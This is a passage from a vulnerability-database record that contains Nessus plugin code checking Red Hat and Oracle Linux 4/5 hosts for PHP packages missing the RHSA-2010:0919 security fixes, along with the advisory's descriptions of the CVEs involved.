exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2531\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0919\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0919\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:11:27", "description": "From Red Hat Security Advisory 2010:0919 :\n\nUpdated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 : php (ELSA-2010-0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-bcmath", "p-cpe:/a:oracle:linux:php-cli", "p-cpe:/a:oracle:linux:php-common", "p-cpe:/a:oracle:linux:php-dba", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pdo", "p-cpe:/a:oracle:linux:php-pear", "p-cpe:/a:oracle:linux:php-pgsql", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php-soap", "p-cpe:/a:oracle:linux:php-xml", "p-cpe:/a:oracle:linux:php-xmlrpc", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/68150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0919 and \n# Oracle Linux Security Advisory ELSA-2010-0919 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68150);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"Oracle Linux 4 / 5 : php (ELSA-2010-0919)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0919 :\n\nUpdated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-November/001749.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-November/001750.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mysql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", 